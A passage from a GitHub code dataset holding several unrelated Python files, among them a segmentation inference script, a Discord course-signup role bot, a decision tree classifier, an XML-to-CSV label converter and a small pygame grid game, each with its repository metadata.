test_data_loader = torch.utils.data.DataLoader(\n dataset=utils.data_loaders.DatasetCollector.get_dataset(\n cfg, cfg.DATASET.TEST_DATASET, utils.data_loaders.DatasetSubset.TEST),\n batch_size=1,\n num_workers=cfg.CONST.N_WORKERS,\n pin_memory=True,\n shuffle=False)\n\n # Setup networks and initialize networks\n tflownet = TinyFlowNet(cfg)\n rmnet = RMNet(cfg)\n\n if torch.cuda.is_available():\n tflownet = torch.nn.DataParallel(tflownet).cuda()\n rmnet = torch.nn.DataParallel(rmnet).cuda()\n\n # Load the pretrained model from a checkpoint\n logging.info('Recovering from %s ...' % (cfg.CONST.WEIGHTS))\n checkpoint = torch.load(cfg.CONST.WEIGHTS)\n tflownet.load_state_dict(checkpoint['tflownet'])\n rmnet.load_state_dict(checkpoint['rmnet'])\n\n # Switch models to evaluation mode\n tflownet.eval()\n rmnet.eval()\n\n # The inference loop\n for idx, (video_name, n_objects, frames, masks, optical_flows) in enumerate(test_data_loader):\n with torch.no_grad():\n _, est_probs = utils.helpers.multi_scale_inference(cfg, tflownet, rmnet, frames, masks,\n n_objects)\n\n video_name = video_name[0]\n output_folder = os.path.join(cfg.DIR.OUTPUT_DIR, 'benchmark', cfg.CONST.EXP_NAME,\n video_name)\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n frames = frames[0]\n est_masks = torch.argmax(est_probs[0], dim=1)\n n_frames = est_masks.size(0)\n for i in tqdm(range(n_frames), leave=False, desc=video_name):\n frame = frames[i]\n est_mask = est_masks[i]\n segmentation = utils.helpers.get_segmentation(frame, est_mask, {\n 'mean': cfg.CONST.DATASET_MEAN,\n 'std': cfg.CONST.DATASET_STD,\n })\n segmentation.save(os.path.join(output_folder, '%05d.png' % i))\n","repo_name":"hzxie/RMNet","sub_path":"core/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"19"} +{"seq_id":"49995613983","text":"import pandas as pd\nfrom finnish_business_portal.utils.myfiles import add_home\n\ndf = pd.read_csv(\"~/git/Omat/HankenKandi/finnish_business_portal/data/firmor201401to04.csv\")\nprint(df.info)\nprint(df.describe)\n\n#df = df[df['liquidations'].astype(bool)]\n#print(df.head())\ndf['lig'] = df.apply(lambda x: len(x.liquidations), axis=1)\ndfliq = df[(df.lig > 2)]\ndfliq.to_csv('liqs.csv')\n\n\n","repo_name":"paapu88/finnish_business_portal","sub_path":"finnish_business_portal/tasks/anayse_prh_csv.py","file_name":"anayse_prh_csv.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"11349895839","text":"#!/usr/bin/env python3\n\"\"\"\nCREATED AT: 2022-09-14\n\nURL: https://leetcode.com/problems/mean-of-array-after-removing-some-elements/\n\nGITHUB: https://github.com/Jiezhi/myleetcode\n\nFileName: 1619-MeanOfArrayAfterRemovingSomeElements\n\nDifficulty: Easy\n\nDesc: \n\nTag: \n\nSee: \n\n\"\"\"\nfrom tool import *\n\n\nclass Solution:\n def trimMean(self, arr: List[int]) -> float:\n \"\"\"\n Runtime: 56 ms, faster than 98.16%\n Memory Usage: 13.9 MB, less than 76.63%\n\n 20 <= arr.length <= 1000\n arr.length is a multiple of 20.\n 0 <= arr[i] <= 10^5\n \"\"\"\n arr.sort()\n n = len(arr)\n per5 = int(n * 0.05)\n return sum(arr[per5:-per5]) / (n - 2 * per5)\n\n\ndef test():\n assert Solution().trimMean(arr=[1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3]) == 2.000\n assert Solution().trimMean(arr=[6, 2, 7, 5, 1, 2, 0, 3, 10, 2, 5, 0, 5, 5, 0, 8, 7, 6, 8, 0]) == 4.000\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"Jiezhi/myleetcode","sub_path":"src/1619-MeanOfArrayAfterRemovingSomeElements.py","file_name":"1619-MeanOfArrayAfterRemovingSomeElements.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41048090326","text":"import torchvision\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import Omniglot\nfrom torchvision.models import resnet18\nfrom tqdm import tqdm\n\nimage_size = 224\ntest_set = torchvision.datasets.Omniglot(\n root=\"./data\",\n background=False,\n transform=transforms.Compose(\n [\n # Omniglot images have 1 channel, but our model will expect 3-channel images\n transforms.Grayscale(num_output_channels=3),\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.ToTensor(),\n ]\n ),\n download=True,\n)\n\nfrom easyfsl.samplers import TaskSampler\nfrom easyfsl.utils import plot_images, sliding_average\n\nN_WAY = 5 # Number of classes in a task\nN_SHOT = 5 # Number of images per class in the support set\nN_QUERY = 10 # Number of images per class in the query set\nN_EVALUATION_TASKS = 100\n\n# The sampler needs a dataset with a \"get_labels\" method. Check the code if you have any doubt!\ntest_set.get_labels = lambda: [\n instance[1] for instance in test_set._flat_character_images\n]\ntest_sampler = TaskSampler(\n test_set, n_way=N_WAY, n_shot=N_SHOT, n_query=N_QUERY, n_tasks=N_EVALUATION_TASKS\n)\n\ntest_loader = DataLoader(\n test_set,\n batch_sampler=test_sampler,\n num_workers=12,\n pin_memory=True,\n collate_fn=test_sampler.episodic_collate_fn,\n)","repo_name":"RianLeevinson/MaritimeFewShotLearning","sub_path":"few_shot_learning/training/omniglot.py","file_name":"omniglot.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4030327829","text":"# Si puedes imaginarlo, puedes programarlo \n\n'''\n Proyecto piedra, papel o tijera: tendremos un uruario que va a jugar contra la computadora en este clasico juego. \n'''\nimport random\n\n\ndef jugar():\n\n print('===JUGAR===')\n print(\"a. Piedra\")\n print(\"b. Papel\")\n print(\"c. Tijera\")\n \n lista = ['a','b','c']\n\n usuario = input(\"Escoge una opcion: \").lower()\n\n computadora = random.choice(lista)\n\n if usuario == computadora:\n \n exit_1 = print(f\"usuarion: {usuario} || {computadora} :Computadora. ¡EMPATE!\")\n \n return exit_1\n \n if ganoJugador(usuario,computadora):\n \n exit_2 = print(f\"Usuario: {usuario} || {computadora} :Computadora. ¡GANASTE!\")\n\n return exit_2\n\n exit_3 = print(f\"Usuario: {usuario} || {computadora} :Computadora. ¡PERDISTE!\") \n\n return exit_3\n\ndef ganoJugador(jugador, oponente):\n \n # retormar True si gano el jugador\n # piedra (a) gana tijera (c)\n # tijera (c) gana papel (b)\n # papel (b ) gana piedra (a)\n\n if((jugador == 'a' and oponente == 'c') or (jugador == 'c' and oponente == 'b') or (jugador == 'b' and oponente == 'a')):\n return True\n else: \n return False\n\nprint(jugar())","repo_name":"Cristhian-Andres/Proyectos-FreeCodeCam-en-Python","sub_path":"4 proyecto: piedra-papel-tijera/piedraPapelTijera.py","file_name":"piedraPapelTijera.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40850528582","text":"\"\"\"\nUsage:\n# Create train data:\npython xml_to_csv.py -i [PATH_TO_IMAGES_FOLDER]/train -o [PATH_TO_ANNOTATIONS_FOLDER]/train_labels.csv\n\n# Create test data:\npython xml_to_csv.py -i [PATH_TO_IMAGES_FOLDER]/test -o [PATH_TO_ANNOTATIONS_FOLDER]/test_labels.csv\n\"\"\"\n\nimport os\nimport glob\nimport pandas as pd\nimport argparse\nimport xml.etree.ElementTree as ET\nimport json\n\n\nclass_set = set([\n 'penny-indian',\n 'penny-wheat',\n 'penny-lincoln',\n 'penny-shield',\n 'nickel-shield',\n 'nickel-liberty',\n 'nickel-buffalo',\n 'nickel-jefferson',\n 'dime-liberty-seated',\n 'dime-barber',\n 'dime-mercury',\n 'dime-roosevelt',\n 'quarter-washington',\n 'quarter-bicentennial'\n])\n\npcgs_category_map = { \n 'Indian Cent' : 'penny-indian',\n 'Lincoln Cent (Wheat Reverse)' : 'penny-wheat',\n 'Lincoln Cent (Modern)' : 'penny-lincoln',\n 'Shield Nickel' : 'nickel-shield',\n 'Liberty Nickel' : 'nickel-liberty',\n 'Buffalo Nickel' : 'nickel-buffalo',\n 'Jefferson Nickel' : 'nickel-jefferson',\n 'Liberty Seated Dime' : 'dime-liberty-seated',\n 'Barber Dime' : 'dime-barber',\n 'Mercury Dime' : 'dime-mercury',\n 'Roosevelt Dime' : 'dime-roosevelt',\n 'Washington Quarter' : 'quarter-washington',\n} \n \npcgs_number_map = {}\n \ndef label_text_to_class(row_label): \n if row_label in class_set:\n return row_label\n elif row_label.split('-')[0][4:] in pcgs_number_map:\n pcgs_record = pcgs_number_map[row_label.split('-')[0][4:]]\n if pcgs_record['category'] == 'Lincoln Cent (Modern)' and 'Shield Reverse' in pcgs_record['sub_category']:\n return 'penny-shield'\n elif pcgs_record['category'] == 'Washington Quarter' and 'Bi-Centennial Reverse' in pcgs_record['sub_category']:\n return 'quarter-bicentennial'\n else:\n return pcgs_category_map[pcgs_record['category']]\n print ('No label text for ' + row_label.split('-')[0][4:])\n return None\n\n\ndef xml_to_csv(path):\n \"\"\"Iterates through all .xml files (generated by labelImg) in a given directory and combines them in a single Pandas datagrame.\n\n Parameters:\n ----------\n path : {str}\n The path containing the .xml files\n Returns\n -------\n Pandas DataFrame\n The produced dataframe\n \"\"\"\n classes_names = []\n xml_list = []\n \n for xml_file in glob.glob(path + \"/*.xml\"):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for member in root.findall(\"object\"):\n label_class = label_text_to_class(member[0].text)\n classes_names.append(label_class)\n value = (\n root.find(\"filename\").text,\n int(root.find(\"size\")[0].text),\n int(root.find(\"size\")[1].text),\n label_class,\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text),\n )\n xml_list.append(value)\n column_name = [\n \"filename\",\n \"width\",\n \"height\",\n \"class\",\n \"xmin\",\n \"ymin\",\n \"xmax\",\n \"ymax\",\n ]\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n classes_names = list(set(classes_names))\n classes_names.sort()\n return xml_df, classes_names\n\n\ndef main():\n global pcgs_number_map\n # Initiate argument parser\n parser = argparse.ArgumentParser(\n description=\"Sample TensorFlow XML-to-CSV converter\"\n )\n parser.add_argument(\n \"-i\",\n \"--inputDir\",\n help=\"Path to the folder where the input .xml files are stored\",\n type=str,\n )\n parser.add_argument(\n \"-o\", \"--outputFile\", help=\"Name of output .csv file (including path)\", type=str\n )\n\n parser.add_argument(\n \"-l\",\n \"--labelMapDir\",\n help=\"Directory path to save label_map.pbtxt file is specified.\",\n type=str,\n default=\"\",\n )\n\n args = parser.parse_args()\n\n if args.inputDir is None:\n args.inputDir = os.getcwd()\n if args.outputFile is None:\n args.outputFile = args.inputDir + \"/labels.csv\"\n\n assert os.path.isdir(args.inputDir)\n \n print (args.inputDir + '/pcgs_number_map.json') \n with open(args.inputDir + '/pcgs_number_map.json') as f:\n pcgs_number_map = json.load(f) \n \n os.makedirs(os.path.dirname(args.outputFile), exist_ok=True)\n xml_df, classes_names = xml_to_csv(args.inputDir)\n xml_df.to_csv(args.outputFile, index=None)\n print(\"Successfully converted xml to csv.\")\n if args.labelMapDir:\n os.makedirs(args.labelMapDir, exist_ok=True)\n label_map_path = os.path.join(args.labelMapDir, \"label_map.pbtxt\")\n print(\"Generate `{}`\".format(label_map_path))\n\n # Create the `label_map.pbtxt` file\n pbtxt_content = \"\"\n for i, class_name in enumerate(classes_names):\n pbtxt_content = (\n pbtxt_content\n + \"item {{\\n id: {0}\\n name: '{1}'\\n}}\\n\\n\".format(\n i + 1, class_name\n )\n )\n pbtxt_content = pbtxt_content.strip()\n with open(label_map_path, \"w\") as f:\n f.write(pbtxt_content)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mbolaris/coin_detection","sub_path":"xml_to_csv.py","file_name":"xml_to_csv.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32211545241","text":"from utils.tree import TreeNode, BuildBinTree\n\n\nclass Solution:\n def isSymmetric(self, root: TreeNode) -> bool:\n lt = []\n rt = []\n\n def LRR(node: TreeNode):\n if not node:\n return\n if not node.left and node.right:\n lt.append(None)\n else:\n LRR(node.left)\n lt.append(node.val)\n if not node.right and node.left:\n lt.append(None)\n else:\n LRR(node.right)\n\n def RRL(node: TreeNode):\n if not node:\n return\n print(node.val)\n if not node.right and node.left:\n rt.append(None)\n else:\n RRL(node.right)\n rt.append(node.val)\n if not node.left and node.right:\n rt.append(None)\n else:\n RRL(node.left)\n\n LRR(root.left)\n RRL(root.right)\n print(lt, rt)\n return lt == rt\n\n\nif __name__ == '__main__':\n vals = [5, 4, 1, None, 1, None, 4, 2, None, 2, None]\n root = BuildBinTree(vals)\n sol = Solution()\n print(sol.isSymmetric(root))\n","repo_name":"kumin/AlgorithmsDataStructures","sub_path":"src/main/python/SymmetricTree.py","file_name":"SymmetricTree.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38331970517","text":"\"\"\"\nITEEBot is a role management bot used in the University of Oulu ITEE\neducation Discord server to allow users to sign up for course areas.\nIt holds an internal database of registered courses, each with an assigned\nrole ID, and a signup message ID. When user reacts to the signup message, the\nbot will assign the associated role for that user. When they remove reaction,\nthe bot will remove the associated role.\n\"\"\"\n\nimport logging\nimport os\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport discord\nfrom sqlalchemy.orm import Session\n\nfrom . import database as db\n\nclass ITEEBot(discord.Client):\n \"\"\"\n This class extends discord.py Client. Primary addition is the ability to\n hold two internal objects: a configuration dictionary, and SQLAlchemy\n engine object for database access. These are held in internal attributes\n _cfg and _engine, respectively.\n \"\"\"\n \n def __init__(self, config, *args, debug=False, **kwargs):\n \"\"\"\n Initializes the bot using options from a configuration file. Also\n initializes logging based on the debug argument, using stdout if it is\n True, or a time rotating logger otherwise.\n \n Intents are currently hard-coded based on what are needed for the bot's\n current features.\n \n * config (dict) - configuration dictionary from the configurator module\n * debug (bool) - run in debug mode\n \"\"\"\n \n self._cfg = config\n intents = discord.Intents(\n members=True,\n messages=True,\n reactions=True,\n guilds=True\n )\n self._engine = db.get_engine(config[\"DB\"])\n if debug: \n logging.basicConfig(level=logging.DEBUG)\n else:\n os.makedirs(os.path.dirname(config[\"LOG\"][\"FILE\"]), exist_ok=True)\n rotator = TimedRotatingFileHandler(\n config[\"LOG\"][\"FILE\"],\n when=config[\"LOG\"][\"ROTATE\"][0],\n interval=config[\"LOG\"][\"ROTATE\"][1],\n )\n logging.basicConfig(\n format=\"%(asctime)s %(name)s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n handlers=[rotator],\n level=logging.INFO\n )\n super().__init__(*args, intents=intents, **kwargs)\n \n def run(self, *args, **kwargs):\n \"\"\"\n Runs the bot, with access token digged up from the configuration.\n \"\"\"\n \n super().run(self._cfg[\"TOKEN\"], *args, **kwargs)\n \n async def on_raw_reaction_add(self, event):\n \"\"\"\n Uses the reaction event's message ID to find the course associated\n with the reacted message. If the course is found, the associated role\n is assigned to the user who triggered the reaction event.\n \n Reactions on channels other than the designated singup channel are \n ignored.\n \n * event (RawReactionEvent) - reaction event from discord.py\n \"\"\"\n \n if event.channel_id != self._cfg[\"SIGNUP_CHANNEL\"]:\n return\n\n with Session(self._engine) as s:\n course = s.query(db.Course).filter_by(\n message_id=event.message_id\n ).first()\n if not course:\n return\n \n guild = self.get_guild(event.guild_id)\n role = guild.get_role(course.role_id)\n await event.member.add_roles(role)\n\n async def on_raw_reaction_remove(self, event):\n \"\"\"\n Uses the reaction event's message ID to find the course associated\n with the reacted message. If the course is found, the associated role\n is removed from the user who triggered the reaction event.\n\n Reactions on channels other than the designated singup channel are \n ignored.\n\n * event (RawReactionEvent) - reaction event from discord.py\n \"\"\"\n\n if event.channel_id != self._cfg[\"SIGNUP_CHANNEL\"]:\n return\n\n with Session(self._engine) as s:\n course = s.query(db.Course).filter_by(\n message_id=event.message_id\n ).first()\n if not course:\n return\n \n guild = self.get_guild(event.guild_id)\n role = guild.get_role(course.role_id)\n member = guild.get_member(event.user_id)\n await member.remove_roles(role)\n\n async def on_error(self, event, *args, **kwargs):\n \"\"\"\n Logs errors. \n \n * event (str) - name of the event that caused the error\n \"\"\"\n \n etype, evalue, etrace = sys.exc_info()\n logging.error(f\"Error processing event {event} with arguments\")\n logging.error(\",\".join(repr(arg) for arg in args))\n logging.error(\",\".join(f\"{key!r}: {val!r}\" for key, val in kwargs))\n logging.error(f\"{etype} - {evalue}\")\n\n async def on_ready(self):\n \"\"\"\n Simply logs the ready status for debug purposes.\n \"\"\"\n \n logging.info(\"Online\") \n\n async def on_message(self, message):\n \"\"\"\n Handles messages from other users. Currently this is a command handler.\n Messages are only parsed if they were sent to the designated control\n channel.\n \n * message (Message) - a discord.py message object\n \"\"\"\n \n if message.author == self.user:\n return\n \n if message.channel.id == self._cfg[\"CONTROL_CHANNEL\"]:\n logging.debug(\"Command channel event\")\n await self._parse_command(message)\n \n async def _parse_command(self, message):\n \"\"\"\n Parses messages that are regarded commands, currently marked with \n exclamation mark prefix (!). The separator is configurable in order to\n account for different use cases without adding escape mechanisms to\n the command syntax.\n \n Command handlers are looked up with getattr and need to be named in\n the _{command_keyword}_command pattern.\n\n * message (Message) - a discord.py message object\n \"\"\"\n \n content = message.content.lstrip(\"<@0123456789> \")\n logging.debug(content)\n\n if not content.startswith(\"!\"):\n return\n command, *args = content.lstrip(\"!\").split(\n self._cfg[\"COMMAND_SEP\"]\n )\n logging.info(f\"Received command {command} with args:\")\n logging.info(self._cfg[\"COMMAND_SEP\"].join(args))\n handler = getattr(self, f\"_{command}_handler\", self._invalid_command)\n await handler(message, *args)\n \n async def _invalid_command(self, message, *args):\n \"\"\"\n Default handler for commands that are not supported. Logs the attempted\n command as a warning.\n\n * message (Message) - a discord.py message object\n \"\"\"\n \n logging.warning(\"Reveived invalid command\")\n logging.warning(message.content)\n \n async def _test_handler(self, message, *args):\n \"\"\"\n A simple test command handler for testing that commands go through.\n\n * message (Message) - a discord.py message object\n \"\"\"\n \n logging.debug(\"Received test command\")\n\n async def _addcourse_handler(self, \n message,\n role_id,\n course_code,\n course_name_en,\n course_name_fi):\n \"\"\"\n Handler for the addcourse command. Upon receiveing this command, the\n bot will post a new signup message to the desingated signup channel,\n using the message template from configuration. After confirming that\n the message has been posted, the bot creates a database record for the\n new course that associates the message ID with the course, and \n especially course's role ID. \n \n * message (Message) - a discord.py message object\n * role_id (int) - ID of an existing role\n * course_code (str) - course's official code\n * course_name_en (str) - course's name in English\n * course_name_fi (str) - course's name in Finnish\n \"\"\"\n \n channel = self.get_channel(self._cfg[\"SIGNUP_CHANNEL\"])\n signup = await channel.send(\n self._cfg[\"MESSAGES\"][\"SIGNUP\"].format(\n code=course_code,\n name_en=course_name_en,\n name_fi=course_name_fi,\n )\n )\n with Session(self._engine) as s:\n course = db.Course(\n code=course_code,\n name_fi=course_name_fi,\n name_en=course_name_en,\n role_id=int(role_id),\n message_id=signup.id\n )\n s.add(course)\n s.commit()\n","repo_name":"enkwolf/ITEE-discord-bot","sub_path":"iteebot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10509768410","text":"#strings are immutable\n#strings defined cannot be changed\nstring=\"string\"\n\n#with replace method only new string can be formed but original cannot be changed\nstring.replace('t','T')\n\nprint(\"string\")# this print will give old value of string \n\n#as to get changed value of string firstly it would have to store in new variable\nstr=string.replace('t','T')\nprint(str)","repo_name":"Jitendra7740/Jitendra-Python-Repository","sub_path":"class37-strings are immutable in python-CipherSchools.py","file_name":"class37-strings are immutable in python-CipherSchools.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28946399119","text":"\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nclass Tree:\n def __init__(self, label, attr, rotest=None):\n self.root = None\n boundary = len(label) // 3\n if rotest is None:\n self.root = self.createTree(label[boundary:], attr[boundary:],\n np.array(range(len(attr.transpose()))), False)\n return\n\n @staticmethod\n def getEntroy(label, attribute):\n result = 0.0\n for this_attr in np.unique(attribute):\n label_temp, entropy = label[np.where(attribute == this_attr)[0]], 0.0\n for this_label in np.unique(label_temp):\n p = len(np.where(label_temp == this_label)[0]) / len(label_temp)\n entropy -= p * np.log2(p)\n result += len(label_temp) / len(label) * entropy\n return result\n\n def createTree(self, label, attribute, attr_idx, prePr, check_attr=None, check_label=None):\n node, right_count = {}, None\n max_type = np.argmax(np.bincount(label))\n if len(np.unique(label)) == 1:\n # 样本同一类\n node['type'] = label[0]\n return node\n if attribute is None or len(np.unique(attribute, axis=0)) == 1:\n #根节点调整\n node['type'] = max_type\n return node\n attr_trans = np.transpose(attribute)\n min_entropy, best_attr = np.inf, None\n\n if prePr:\n right_count = len(np.where(check_label == max_type)[0])\n for this_attr in attr_trans:\n entropy = self.getEntroy(label, this_attr)\n if entropy < min_entropy:\n min_entropy = entropy\n best_attr = this_attr\n\n branch_attr_idx = np.where((attr_trans == best_attr).all(1))[0][0]\n if prePr:\n sub_right_count = 0\n check_attr_trans = check_attr.transpose()\n\n for temp in np.unique(best_attr):\n branch_data_idx = np.where(best_attr == temp)[0]\n predict_label = np.argmax(np.bincount(label[branch_data_idx]))\n check_data_idx = np.where(check_attr_trans[branch_attr_idx] == temp)[0]\n check_branch_label = check_label[check_data_idx]\n sub_right_count += len(np.where(check_branch_label == predict_label)[0])\n if sub_right_count <= right_count:\n node['type'] = max_type\n return node\n values = []\n for temp in np.unique(best_attr):\n values.append(temp)\n branch_data_idx = np.where(best_attr == temp)[0]\n if len(branch_data_idx) == 0:\n new_node = {'type': np.argmax(np.bincount(label))}\n else:\n branch_label = label[branch_data_idx]\n branch_attr = np.delete(attr_trans, branch_attr_idx, axis=0).transpose()[branch_data_idx]\n new_node = self.createTree(branch_label, branch_attr,\n np.delete(attr_idx, branch_attr_idx, axis=0),\n prePr, check_attr, check_label)\n node[str(temp)] = new_node\n node['attr'] = attr_idx[branch_attr_idx]\n node['type'] = max_type\n node['values'] = values\n return node\n\n\n # 预测结果\n def predict(self, data):\n node = self.root\n while node.get('attr') is not None:\n attr = node['attr']\n node = node.get(str(data[attr]))\n if node is None:\n return None\n return node.get('type')\n\n\n\n\n\nall_data = np.loadtxt(\"train.txt\")# 读取数据\nlabel = all_data[:, -1]\nlabel = label.astype(np.int) # label 转整数\n\ndata = np.delete(all_data, -1, axis=1)\nprint(data.shape,label.shape)\n#划分数据集 test = 0.2\nX_train,X_test,y_train,y_test = train_test_split(data,label,test_size = 0.2,random_state = 0)\n\n\nprint(data.shape,X_train.shape)\n\n\n\ntree = Tree(y_train, X_train, None)\n\n\ntest_count = len(y_test)\ntest_data, test_label = X_test, y_test\n\n\ntimes = 0 #统计\n\nfor idx in range(test_count):\n if tree.predict(test_data[idx]) == test_label[idx]:\n times += 1\n\nprint('testsize 为0.2时 正确率为 %.2f %%' % (times * 100 / test_count))\n\n#划分数据集 test = 0.4\nX_train,X_test,y_train,y_test = train_test_split(data,label,test_size = 0.4,random_state = 0)\n\n\n# print(data.shape,X_train.shape)\n\n\n\ntree = Tree(y_train, X_train, None)\n\n\ntest_count = len(y_test)\ntest_data, test_label = X_test, y_test\n\n\ntimes = 0 #统计\n\nfor idx in range(test_count):\n if tree.predict(test_data[idx]) == test_label[idx]:\n times += 1\n\nprint('testsize 为0.4时 正确率为 %.2f %%' % (times * 100 / test_count))\n\n#划分数据集 test = 0.6\nX_train,X_test,y_train,y_test = train_test_split(data,label,test_size = 0.6,random_state = 0)\n\n\n# print(data.shape,X_train.shape)\n\n\n\ntree = Tree(y_train, X_train, None)\n\n\ntest_count = len(y_test)\ntest_data, test_label = X_test, y_test\n\n\ntimes = 0 #统计\n\nfor idx in range(test_count):\n if tree.predict(test_data[idx]) == test_label[idx]:\n times += 1\n\nprint('testsize 为0.6时 正确率为 %.2f %%' % (times * 100 / test_count))\n\n#划分数据集 test = 0.8\nX_train,X_test,y_train,y_test = train_test_split(data,label,test_size = 0.8,random_state = 0)\n\n\n# print(data.shape,X_train.shape)\n\n\n\ntree = Tree(y_train, X_train, None)\n\n\ntest_count = len(y_test)\ntest_data, test_label = X_test, y_test\n\n\ntimes = 0 #统计\n\nfor idx in range(test_count):\n if tree.predict(test_data[idx]) == test_label[idx]:\n times += 1\n\nprint('testsize 为0.8时 正确率为 %.2f %%' % (times * 100 / test_count))\n\n","repo_name":"louisgzli/CS405_Machine_Learning","sub_path":"week2/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":5660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32428410438","text":"from braket.circuits import circuit\nimport numpy\n\n\n@circuit.subroutine(register=True)\ndef CRYGate(theta, dtype=None):\n theta2 = float(theta) / 2\n cos = numpy.cos(theta2)\n sin = numpy.sin(theta2)\n return numpy.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, cos, -sin],\n [0, 0, sin, cos]], dtype=dtype)\n","repo_name":"artificial-brain/quantumcat","sub_path":"quantumcat/gates/custom_gates/braket/cry_gate.py","file_name":"cry_gate.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"19"} +{"seq_id":"41737529347","text":"import os\nimport pygame\nfrom pygame.locals import *\nfrom enum import Enum\nfrom collections import namedtuple\n\n#%% Constants\n\nFPS = 7\nWINDOWWIDTH = 200\nWINDOWHEIGHT = 200\nBLOCKSIZE = 20\nassert WINDOWWIDTH % BLOCKSIZE == 0, \"Window width must be a multiple of block size.\"\nassert WINDOWHEIGHT % BLOCKSIZE == 0, \"Window height must be a multiple of block size.\"\nCELLWIDTH = int(WINDOWWIDTH / BLOCKSIZE)\nCELLHEIGHT = int(WINDOWHEIGHT / BLOCKSIZE)\n\n# R G B\nWHITE = (255, 255, 255)\nBLACK = ( 0, 0, 0)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nDARKGREEN = ( 0, 155, 0)\nDARKGRAY = ( 40, 40, 40)\nYELLOW = (255, 255, 0)\n\nUP = 'up'\nDOWN = 'down'\nLEFT = 'left'\nRIGHT = 'right'\n\n\nBGCOLOR = BLACK\n\n # start Block close to the top of the game window\nstartx = 2*BLOCKSIZE\nstarty = 2*BLOCKSIZE\n\ntx = (BLOCKSIZE * 8)\nty = (BLOCKSIZE * 8)\n\n\n#%% Main Game\n\nPoint = namedtuple('Point', 'x, y') \n\nclass blocks:\n def __init__(self):\n global FPSCLOCK, DISPLAYSURF, BASICFONT\n\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n BASICFONT = pygame.font.Font('freesansbold.ttf', 18)\n pygame.display.set_caption('Q_learning_Block_Game')\n\n # init game state\n \n self.direction = None\n\n self.head = Point(startx, starty) # got this code (Point(x,y) from snake_game)\n self.blocks = [self.head, \n ] #for future I should be able to insert more blocks into this list!\n \n self.t = Point(tx, ty)\n self.target = [self.t]\n\n def play_step(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n os._exit(0)\n\n\n DISPLAYSURF.fill(BGCOLOR)\n\n def drawGrid(self):\n for x in range(0, WINDOWWIDTH, BLOCKSIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))\n for y in range(0, WINDOWHEIGHT, BLOCKSIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWWIDTH, y))\n\n def draw_Block(self):\n for pt in self.blocks:\n pygame.draw.rect(DISPLAYSURF, RED, pygame.Rect(pt.x, pt.y, BLOCKSIZE, BLOCKSIZE))\n # access the x and y coordinates of nametuple using index numbers!!! x = 400 and y = 300. x and y are just the keys to find the values of x and y. Its like a dictionary.\n\n\n def draw_target(self):\n for pt in self.target:\n pygame.draw.rect(DISPLAYSURF, GREEN, pygame.Rect(pt.x, pt.y, BLOCKSIZE, BLOCKSIZE))\n\n","repo_name":"ivicino/Block_game","sub_path":"Block_game_AI.py","file_name":"Block_game_AI.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19629282669","text":"#!/usr/bin/python\n\n#create extension postgres_fdw;\n#create server zhangyu foreign data wrapper postgres_fdw options(host '192.168.2.120', port '5432', dbname 'taxi_data');\n#create user mapping for postgres server zhangyu options(user 'postgres', password 'p@ssw0rd');\n\n\n\n\nimport binascii\nimport sys\nimport math\nimport time\nimport os\nimport subprocess\n\ndef num2deg(xtile, ytile, zoom):\n n = 2.0 ** zoom\n lon_deg = xtile / n * 360.0 - 180.0\n lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))\n lat_deg = math.degrees(lat_rad)\n return (lat_deg, lon_deg)\n \nwhile True:\n (z,x,y,s) = map(float,sys.stdin.readline().split());\n (lat1, 